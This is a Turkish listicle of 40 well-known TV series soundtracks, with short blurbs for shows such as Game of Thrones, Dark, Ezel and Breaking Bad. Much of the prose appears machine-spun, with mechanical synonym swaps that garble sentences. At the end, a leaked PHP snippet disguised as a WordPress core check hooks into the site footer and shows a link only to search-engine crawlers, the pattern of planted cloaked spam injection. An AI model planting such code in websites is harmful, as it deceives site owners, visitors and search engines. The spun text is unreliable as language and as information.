Sıradaki içerik:

Google Chrome'ın Büyük Sorunlarından Biri Çözülüyor

e
sv

En İyi 40 Dizi Müziği

24 Aralık 2020 03:16
avatar

Admin

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

Pek fazla kişiyi adeta ekrana kilitleyerek haftalarca yeni bölümlerini bekleten diziler, hepimiz için özel bir yere sahiptir. Bu diziler, filmlerin aksine daha yavaş ve karakterlerin hikayesine odaklanarak ilerlerler, bu sayede de kendine daha da fazla çekebilirler.

Hepimiz, hayatımızın bir noktasında sevdiğimiz dizi için uzun maratonlar yapmışızdır. Peki bizleri böylesine ekrana kilitleyen dizilerin kaliteli olmasının arkasındaki en büyük sebepler neler? Elbette oyunculuk, hikaye, kamera açıları fazla önemlidir, ancak en az onlar kadar önemli bir şey daha vardır: Müzikler. Dizinin gerek özgün müzikleri gerekse de içerisinde yer saha şarkılar izleyiciyi içine çekerek hikayeye bağlar. Bugün sizlere en fazla beğenilen bazı dizi müziklerini listeleyeceğiz.

Unutmadan söyleyelim, bu liste belirli aralıklarla güncellenecektir. Dünya üzerinde fazla çok dizi mevcut ve elbette aralarında fazla başarılı müzikler var. Bu sebeple bir sonraki güncellememizde listemize eklememizi istediğiniz müzikleri yorumlar kısmında bizlere iletebilirsiniz.

Son güncelleme tarihi: 24.12.2020

Ayrıca buraya tıklayarak film müzikleri için hazırladığımız listemize de ulaşabilirsiniz.

Müziklere oynatma listesinden ulaşın

Aşağıda listelediğimiz ve bazılarımız için altın niteliği taşıyan tüm bu müzikleri bir YouTube oynatma listesinde birleştirdik. Bu listeye buraya tıklayarak ulaşabilirsiniz. Ayrıca listemizin Spotify listesine de buraya tıklayarak ulaşabilirsiniz.

En başarılı dizi müzikleri

Game of ThronesThe WitcherBehzat Ç.DarkDeliyürekMasumDoctor WhoSherlock HolmesFriendsKurtlar VadisiShamelessYalancı YarimBreaking BadThe X-FilesSpartacusHow i met Your MotherTrue BloodMad MenYılan HikayesiThe Big Bang TheorySons of AnarchySuskunlarPink PantherKnight RiderAdanalı NarcosLeyla ile MecnunVikingsPeaky BlindersEzelFringeSense8WestworldSkinsLostLa casa de papelPunisherBetter Call SaulThe Last KingdomSuits

Game of Thrones

Dizi müziği denildiğinde belki de ilk akla gelen tını, Game of Thrones’un müziğidir. Dizinin o taht savaşını konu saha hikayesini bize fazla iyi şekilde yansıtan müzik, dizinin efsaneleşmesinde de önemli aktörler arasında yer alıyor.

The Witcher

Neredeyse her oyun severlerin kalbinde yeri olan Rivyalı Geralt; namı paha Witcher’ın Netflix’in dokunuşuyla yaşam bulması dizi dünyasında bir heyecan yaratmıştı. Mesleği gereği canavar avlayıp geçinen Geralt’a, yol arkadaşı Dandelion’ın bestelediği müzik Witcher’ın tüm ruhunu bizlere sunuyor.

Behzat Ç.

Türk dizileri günümüzde bazı kalıplara oturmuş olsa da birkaç yıl geriye gittiğimizde fazla güzel dizilerimiz vardı. Bu dizilerden biri olan Behzat Ç., gerek jenerik müziği gerekse de Pilli Bebek’in muhteşem şarkılarıyla sadece güzel bir öykü değil, aynı zamanda müziksel anlamda da son derece doyurucu bölümler içeriyordu.

Dark

Netflix’in beyin yakan dizisi Dark, müzikleriyle de bu amacını desteklemeye devam ediyor. Son derece hipnoz edici bir özelliğe sahip Dark müzikleri, sizde yeniden diziye başlama isteği uyandırabilir.

Deliyürek

Pazartesi günlerini bekleme sebebimiz olan Deliyürek dizisi, yayınlandığı dönemde tüm Türkiye’yi ekranlara kilitliyordu. Deliyürek’i hiç izlemeyen kişilerin bile dinleyince suratında hoş bir gülümseme bırakacak müziği ise Türk dizi tarihinin en ünlü müziklerinden biri oldu.

Doctor Who

İlk yayın tarihinin ardından 57 yıl geçen tarihin en uzun soluklu dizilerinden biri olan Doctor Who, bu uzay – zaman yolculuğunda bizlere enfes müzikler de sundu. Jenerik müziği zaten ikon olan Doctor Who’nun “The Long Song” müziğine de ayrı bir yer açmak istiyorum. Ayrıca buradan tüm Whovian dostlarımıza selam olsun.

Masum

Blue TV ile karşımıza çıkan ve perde arkasında derin sırlar barındıran Masum, izleyiciyi konusu ve oyuncu kadrosuyla ekrana kilitlemişti. Sır perdesini aralamaya çalışırken, her bölümde karşımıza çıkan o efsanevi ve bir o kadar nostaljik olan müziği, kasvetiyle ve derinliğiyle diziye yeni bir ebat katıyor.

Sherlock Holmes

Çok ince ayrıntılara dikkat ederek suçları açığa çıkaran bir dedektif olan Sherlock Holmes’un BBC imzalı dizisinde, tüm işleyişi fazla iyi bir şekilde yansıtan müzikler yer alıyor.

Friends

Friends, final yapmasının üzerinden 15 yıldan fazla zaman geçmesine rağmen hala gündemde kalmaya devam ediyor. 6 arkadaşın bir apartman dairesindeki hikayesini anlatan dizi, özellikle jenerik müziğiyle hala aklımızda.

Yalancı Yarim

Genç yaşta kaybetmiş olmamıza rağmen gerek kişiliği gerekse de sesiyle ülkemizin en özel şarkıcılarından biri olan Barış Akarsu’nun başrolünde yer aldığı ve söylediği şarkılarla donattığı Yalancı Yarim’i bu listeye almasaydık biraz noksan kalmış olurdu.

Shameless

Ülkemizde de uyarlaması çekilen ünlü dizi Shameless, o özgür ruhunu müziğiyle de bizlere buluşturmuştu. Dizi, bizleri her yeni bölümünde fazla hoş bir müzikle karşılıyordu.

Breaking Bad

Son yüzyılın en iyi dizisi seçilen Breaking Bad, müzikleriyle de karşımıza fazla iddialı çıktı. Bir kimya öğretmeninin uyuşturucu işine girdiği dizi, o ambiyansını müzikleriyle de bizlere yansıtmayı başarmıştı.

The X-Files

İnternette daha fazla “illuminati” ile özdeşleşen bu müzik, hemen derhal herkesin aşina olduğu bir şarkı. FBI ajanlarının sır perdesini aralamaya çalıştığı The X-Files’a da fazlasıyla yakışıyordu.

Kurtlar Vadisi

Kurtlar Vadisi, ülkemizin en ünlü dizileri arasında yer alıyor. Özellikle ilk 97 bölümüyle efsaneleşen dizide fazla kaliteli müzikler yer alıyor. Özellikle operasyon müziği, tüm Türkiye’yi gaza getirebiliyordu.

Spartacus

Hala pek fazla şahıs için dünyanın en iyi dizilerinden biri olarak kabul edilen Spartacus, efsane Trakyalının Roma’ya karşı isyanını fazla etkileyici bir şekilde aktarmıştı. Bu noktada da dizinin etkileyici görüntüleri, oyunculukları ve elbette ki müziklerinin büyük etkisi bulunuyor. Spartacus’ü özel yapan şeylerden biri de dizide Türk ezgilerini de görüyor olmamızdı. Hatta bir sahnede “Eledim Eledim” şarkısı duyuluyordu.

How i met Your Mother

Friends’te olduğu gibi giriş müziğiyle bizleri büyüleyen bir öbür sitcom’da How i Met Your Mother’dı. 5 arkadaşın MacLaren’s Pub’ta geçirdikleri zamanı anlatan dizi, sadece giriş müziğiyle değil bölümler arasında seçilen şarkılarıyla da fazla sevilmişti.

True Blood

Bir devre fazla popüler olan vampir dizileri furyasında kendine yer edinen True Blood, müzik seçimleriyle aralarında en iyi olanıydı.

Mad Men

1960’ların New York’unda geçen dizide reklam şirketi yöneticisi Don Draper’ın hayatına tanıklık ediyoruz. Tüm zamanların en iyi dizilerinden biri olan yapım, müziğiyle de onlarca kişiyi kendine hayran bıraktı.

Yılan Hikayesi

Komiser Memoli ve köy kızı Zeyno’nun arasındaki ilişkiyi anlatan Yılan Hikayesi, yayınlandığı 1999 – 2002 yılları arasında tüm Türkiye’yi televizyon başına kilitlemeyi başarmıştı. O içimizi eriten müziği ise hala hafızalarımızın bir köşesinde yer alıyor.

The Big Bang Theory

Dünyanın en ünlü sit-com’larından olan The Big Bang Theory, genç ilim insanları ve onların güzel komşularının arasındaki hikayeyi anlatıyor. Dizinin giriş müziği ise gerçekten etkileyici.

Sons of Anarchy

Eğer chopper tarzı motorlara ilginiz varsa zaten Sons of Anarchy’i duymuşsunuzdur. Harley Davidson marka motorlarla muhteşem bir görsel şölen sunan dizi, geneli The White Buffalo’ya ait müzikleriyle de kendi izleyicisini memnun etmeyi başarıyor.

Suskunlar

Türk dizileri arasında kısa süre ekranlarda kalsa da akıllarda ve yüreklerde izler bırakmayı başarmış olan Suskunlar dizisi, müzikleri ile de bizleri hüzne boğuyordu.

Pink Panther

Dünyanın en ünlü çizgi dizilerinden biri olan Pembe Panter’in efsane müziğini duymayan yoktur herhalde.

Adanalı

Oktay Kaynarca, Serenay Sarıkaya gibi isimlerin yer aldığı Adanalı dizisi, hepimizin aklında bir şekilde kalmış olsa da Ceza’nın bu dizi için çıkardığı şarkı, günümüzde bile hala dinleniyor.

Knight Rider

Ülkemizde Kara Şimşek olarak bilinen Knight Rider dizisi, bir döneme damgasını vurmuş bir dizi. Elbette dizinin müziğini de duymayan yoktur diye düşünüyoruz. 1982’de yayınlanmaya başlayan ve 4 sezon süren dizi, o dönemde ülkemizdeki tek kanal olan TRT’de yayınlanmıştı.

Narcos

Narcos, dünyanın en büyük uyuşturucu kaçakçılarından olan Pablo Escobar’ın yaşam hikayesini anlatıyor. Netflix’te yayınlanan dizi, fazla büyük bir hayran kitlesine ulaşmasının yanında müzikleriyle de fazla beğenildi.

Leyla ile Mecnun

Kireçburnu Sahili’nde sallanan son ellerden sonra bir daha ekranlarda göremediğimiz Leyla ile Mecnun dizisi, mizahı ve duygusallığı ile bize ekranlarda güzel zaman sunardı. Bu efsane diziyi sadece bölümleriyle hatırlamak fazla da doğru olmaz. Bir o kadar efsane olan müziklere sahip olan Leyla ile Mecnun’dan hafızalarımıza kazınan 2 müziği sizlerle paylaşıyoruz.

Vikings

Efsane Viking kralı Ragnar Lothbrok ve çocuklarının çiftçilikten krallığa yükselen hikayesini anlatan dizi, müzikleriyle de bizleri o dönemlere götürmeyi başarmıştır.

Peaky Blinders

Birinci Dünya Savaşı sonrasında İngiltere’de faaliyet gösteren “Peaky Blinders” isimli çeteyi anlatan dizi, o eski dönemleri bizlere yansıtmak için müziklerin gücünden de fazlasıyla yararlandı.

Ezel

Türk dizi tarihinin en başarılı örneklerinden biri olan Ezel, muhteşem öykü ve oyunculuklarının yanında özellikle de müzikleriyle ortaya çıkmıştır. Dizide her biri birbirinden başarılı fazla sayıda müzik bulunuyor. Ayrıca Tuncel Kurtiz’in sesinden duyduğumuz efsane şiirler de Ezel’i özel yapan unsurlar arasında yer alıyor.

Fringe

FBI ajanı Olivia Dunham, metafizik üzerine araştırma yapan Walter Bishop ve oğlu Peter Bishop’un dizi dışı olayları incelemesini konu saha dizi, jeneriği ile de bizi adeta farklı bir dünyaya götürüyor.

Sense8

Sense8, dünyanın farklı şehirlerinde yaşayan ve Angel’ın ölümüyle olağanüstü bir şekilde birbirlerine bağlanan sekiz kişinin yaşadıklarını bize aktarıyor. Dizinin jeneriği de karmaşık atmosferini fazla iyi bir şekilde yansıtıyor.

Westworld

Her şeyin yasal olduğu ve insanların yapay zekaya sahip robotlara istediği gibi davranabildiği bir ortamda, robotların şuur kazanmasıyla gerçekleşen olayları konu saha Westworld’ün Ramin Djawadi’nin eseri olan jeneriğini de listeye eklemeden geçemezdik.

Skins

Skins, bir küme gencin arkadaşlık ve aşk ekseninde yaşadıkları eğlenceli ve dramatik konuları ele alıyor. Skins dizisinin jeneriği de bize gençliğin verdiği o neşeyi ve özgürlüğü hissettiren türden bir müzik olarak listede yerini alıyor. Dizinin 18+ izleyiciye hitap ettiğini hatırlatalım.

Lost

Final bölümüyle izleyicilerini hayal kırıklığına uğratsa da unutulmazlar arasında yer saha dizi, müzikleriyle bizlere eşsiz bir tat sunuyor.

La casa de papel

Bir suç dehasının kurduğu hırsızlık çetesinin İspanya’da gerçekleştirdiği soygunları ele saha La casa de papel, kısa sürede büyük bir hayran kitlesine ulaştı. Dizinin müzikleri ise popüler kültüre damga vurdu.

Punisher

Marvel evreninde kini ve acımasızlığı ile tüyleri diken diken eden karakter desek aklınıza ilk kim gelirdi? Elbette Frank Castle’dan bahsediyoruz. Ailesine kurulan komplonun intikamını alma yolunda karşısına çıkan herkesi etkisiz bırakan Punisher’ın içindeki duyguyu, kini ve öfkeyi bu müzikle hissedeceksiniz.

Better Call Saul

Breaking Bad dizisinden tanıdığımız ve daha sonra diziye evrilip, bir hayata dönüşen Saul Goodman’ın nasıl efsaneye dönüştüğünün hikayesi. Bu hikayeyi süsleyen, riyakarlığı ve sevimliliği hissettiren akıllara yer edecek müziğiyle sizleri kafa başa bırakıyoruz.

The Last Kingdom

Viking ruhunu, kendi özgürlükleri ve krallıkları adına verdikleri savaşı, kanla yıkanan günlerin ve ay ışığında yapılan politikaların en hırçın örneklerini sunan The Last Kingdom, müzikleriyle de bu ruha anlam katıyor.

Suits

Bir hukuk yarışı nasıl maceraya dönüşüyor? İzlerken kemer takma hissine kapılacağınız dizinin tüm heyecanını her açılışta karşımıza sunan, Suits jenerik müziğini unutamazdık.

Listemizin burada sonuna geldik. Peki sizlerin kesinlikle listede olması gerekiyor dediğiniz müzikler mevcut mı? Düşünce ve önerilerinizi yorumlar kısmında bizlere iletebilirsiniz

 • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');